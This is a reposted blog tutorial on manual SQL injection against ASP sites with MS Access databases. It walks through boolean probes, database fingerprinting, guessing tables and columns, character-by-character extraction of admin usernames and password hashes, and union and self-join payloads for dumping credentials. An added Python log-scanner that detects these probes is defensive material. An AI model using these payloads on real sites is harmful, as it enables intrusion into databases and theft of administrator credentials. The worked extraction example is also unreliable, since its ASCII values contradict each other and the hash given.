Access manual injection

[SQL] Manual injection against Access



1) Testing for injection
'            returns an error    -- an injection flaw may exist
and 1=1      returns normally
and 1=2      returns an error    -- confirms the injection flaw

2) Identifying the database
and (select count(*) from msysobjects)>0    -- an "insufficient permissions" error means an Access database
and (select count(*) from sysobjects)>0     -- a normal return means an MSSQL database

3) Guessing table and column names
and exists (select * from table_name)            -- guess a table name
and exists (select column_name from table_name)  -- guess a column name
e.g.:
Check whether a table named admin exists: and exists (select * from admin)
Check whether a column named username exists: and exists (select username from admin)
Check whether a column named password exists: and exists (select password from admin)

4) Guessing the username and password length
and (select top 1 len(column_name) from table_name)=X   -- X is a number; a normal return means the guessed column's length is that number
e.g.:
Check whether the username length is greater than zero: and (select top 1 len(username) from admin)>0
Check whether the username length is greater than four: and (select top 1 len(username) from admin)>4
Check whether the username length is greater than five: and (select top 1 len(username) from admin)>5
-- The username is usually admin: greater than four returns normally and greater than five returns an error, so its length is 5. Passwords are usually MD5 hashed, so they are generally 16 or 32 characters long.

5) Guessing the ASCII codes of the username and password

-- Use binary search (halving the range) here for efficiency. ASCII codes run from 0 to 126.

Here we assume the username is admin and the password is admin888; run the guessed ASCII codes through a conversion tool to get the plaintext.

and(select top 1 asc(mid(username,1,1))from admin)>97 
and(select top 1 asc(mid(username,1,1))from admin)=97  
and(select top 1 asc(mid(username,2,1))from admin)=100
and(select top 1 asc(mid(username,3,1))from admin)=109
and(select top 1 asc(mid(username,4,1))from admin)=105
and(select top 1 asc(mid(username,5,1))from admin)=110

97 100 109 105 110 admin
-----------------------------------------------------------
and(select top 1 asc(mid(password,1,1))from admin)=52
and(select top 1 asc(mid(password,2,1))from admin)=54
and(select top 1 asc(mid(password,3,1))from admin)=57
and(select top 1 asc(mid(password,4,1))from admin)=56
and(select top 1 asc(mid(password,5,1))from admin)=48
and(select top 1 asc(mid(password,6,1))from admin)=100
and(select top 1 asc(mid(password,7,1))from admin)=51
and(select top 1 asc(mid(password,8,1))from admin)=50
and(select top 1 asc(mid(password,9,1))from admin)=99
and(select top 1 asc(mid(password,10,1))from admin)=48
and(select top 1 asc(mid(password,11,1))from admin)=53
and(select top 1 asc(mid(password,12,1))from admin)=53
and(select top 1 asc(mid(password,13,1))from admin)=57
and(select top 1 asc(mid(password,14,1))from admin)=102
and(select top 1 asc(mid(password,15,1))from admin)=56
and(select top 1 asc(mid(password,16,1))from admin)=32

52 54 57 101 56 48 100 51 50 99 48 53 53 57 102 56 32
469e80d32c0559f8    -- cracking the MD5 gives the password admin888

=================== divider ===================

At this point the username and password are both out, and the dreadful manual process is over.

But isn't that a bit tedious? Besides tools, there is also the more convenient union query method. Continuing:

1) Union query:
order by X      -- guess the column count (X is a number; an error means X is too large; keep going until it returns normally, which tells you how many columns there are)

union select 1,2,3,4,5,6....from table_name       -- write as many numbers as there are columns; this reveals which column positions are displayed
union select 1,column_name,3,4,5,6 from table_name   -- displays the contents of that column; put the column name in whichever position is displayed

e.g.:
order by 15 error
order by 16 OK    -- so there are 16 columns

Suppose the table is admin and the columns are username and password.
The constructed statement is:
http:url.asp?id=1 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16 from admin

Fill the column names into the displayed positions, here assumed to be 6 and 8.
The constructed statement is:
http:url.asp?id=1 union select 1,2,3,4,5,username,7,password,9,10,11,12,13,14,15,16 from admin

=================== divider ===================

At this point the username and password are exposed just the same. Simpler, isn't it?

Sometimes a union query reveals the displayed positions, but the column name just cannot be guessed and none of the usual tools can crack it; that is where offset injection comes in.

By the way:

Note that the number of columns in the query being injected into must be greater than or equal to twice the number of columns in the target table.

1) First construct a statement like this: select * from (admin as a inner join admin as b on a.id=b.id)

A few notes:
-- * stands for the columns; widening it increases the chance that username and password land in a displayed position
-- (admin as a inner join admin as b on a.id=b.id) is a self-join of the admin table
-- id is a column; if the id column is named differently, change it accordingly
-- the whole statement means: the admin table is aliased as a and also as b, and the condition is that a's id column equals b's id column, returning all rows where they are equal; obviously a and b are the same table, so every row is returned.

An example makes it clearer:
http://url.asp?id=1 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16 from admin

Suppose the table has five columns; then
http://url.asp?id=1 union select 1,2,3,4,5,6,* from (admin as a inner join admin as b on a.id=b.id)

If you are out of luck and it still does not show, then
http://url.asp?id=1 union select 1,2,3,4,5,6,a.id,* from (admin as a inner join admin as b on a.id=b.id)

http://url.asp?id=1 union select 1,2,3,4,5,6,a.id,b.id,* from (admin as a inner join admin as b on a.id=b.id)

Now the ordering of the columns inside * is shuffled, increasing the chance they show up on the page.

If it still does not show, then
http://url.asp?id=1 union select 1,* from ((admin as a inner join admin as b on a.id=b.id) inner join admin as c on a.id=c.id)

http://url.asp?id=1 union select 1,a.id,b.id,c.id,* from ((admin as a inner join admin as b on a.id=b.id) inner join admin as c on a.id=c.id)
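Every step in this post, from the `and 1=1`/`and 1=2` pair and the `msysobjects` fingerprint through `len()`, `asc(mid())` character extraction, `order by` counting and the union/self-join queries, leaves a recognisable sequence in the web server access log. The following Python detector is an added example, not code from the original post or its source, and flags that sequence per client; the log lines, client addresses and the two-signature threshold are constructed for the example.

```python
import re
from urllib.parse import unquote_plus

# Signatures for the Access-injection probes walked through above, matched
# case-insensitively against the URL-decoded request path.
SIGNATURES = {
    "boolean_probe":   re.compile(r"\band\s+1\s*=\s*[12]\b", re.I),
    "db_fingerprint":  re.compile(r"\bfrom\s+(msysobjects|sysobjects)\b", re.I),
    "table_guess":     re.compile(r"\bexists\s*\(\s*select\b", re.I),
    "length_guess":    re.compile(r"\blen\s*\(\s*\w+\s*\)", re.I),
    "char_extraction": re.compile(r"\basc\s*\(\s*mid\s*\(", re.I),
    "column_count":    re.compile(r"\border\s+by\s+\d+", re.I),
    "union_select":    re.compile(r"\bunion\s+select\b", re.I),
    "self_join":       re.compile(r"\binner\s+join\b.*\bon\s+\w+\.\w+\s*=\s*\w+\.\w+", re.I),
}

# Common-log-format line: client, identity, user, [timestamp], "request line", status, size.
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST) (\S+) [^"]*" (\d{3})')

# Constructed sample log: one client replaying the probes from this post, one benign request.
SAMPLE_LOG = [
    '203.0.113.7 - - [05/Jul/2017:19:05:01 +0800] "GET /url.asp?id=1%20and%201=1 HTTP/1.1" 200 5123',
    '203.0.113.7 - - [05/Jul/2017:19:05:02 +0800] "GET /url.asp?id=1%20and%201=2 HTTP/1.1" 500 311',
    '203.0.113.7 - - [05/Jul/2017:19:05:03 +0800] "GET /url.asp?id=1%20and%20(select%20count(*)%20from%20msysobjects)%3E0 HTTP/1.1" 500 311',
    '203.0.113.7 - - [05/Jul/2017:19:05:04 +0800] "GET /url.asp?id=1%20and%20(select%20top%201%20len(username)%20from%20admin)%3E4 HTTP/1.1" 200 5123',
    '203.0.113.7 - - [05/Jul/2017:19:05:05 +0800] "GET /url.asp?id=1%20and(select%20top%201%20asc(mid(username,1,1))from%20admin)=97 HTTP/1.1" 200 5123',
    '203.0.113.7 - - [05/Jul/2017:19:05:06 +0800] "GET /url.asp?id=1%20union%20select%201,2,3,4,5,6,*%20from%20(admin%20as%20a%20inner%20join%20admin%20as%20b%20on%20a.id=b.id) HTTP/1.1" 200 5400',
    '198.51.100.9 - - [05/Jul/2017:19:05:07 +0800] "GET /url.asp?id=1 HTTP/1.1" 200 5123',
]

def classify(path):
    """Names of every probe signature present in one request path."""
    decoded = unquote_plus(path)
    return [name for name, rx in SIGNATURES.items() if rx.search(decoded)]

def scan(lines):
    """{client_ip: {signature: count}} over parseable log lines that tripped a signature."""
    hits = {}
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        ip, path, _status = m.groups()
        for tag in classify(path):
            per_ip = hits.setdefault(ip, {})
            per_ip[tag] = per_ip.get(tag, 0) + 1
    return hits

def suspicious_clients(hits, min_distinct=2):
    """Clients tripping at least min_distinct probe types: a lone 'and 1=1' may be noise."""
    return sorted(ip for ip, tags in hits.items() if len(tags) >= min_distinct)
```

A client that pairs the database fingerprint with dozens of `asc(mid())` requests is reading data one character at a time, so the per-signature counts are the thing to alert on, not any single request.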

 

[Note] This article is reposted from: http://sh4dow.lofter.com/post/395c80_1214862

posted @ 2017-07-05 19:05 0nth3way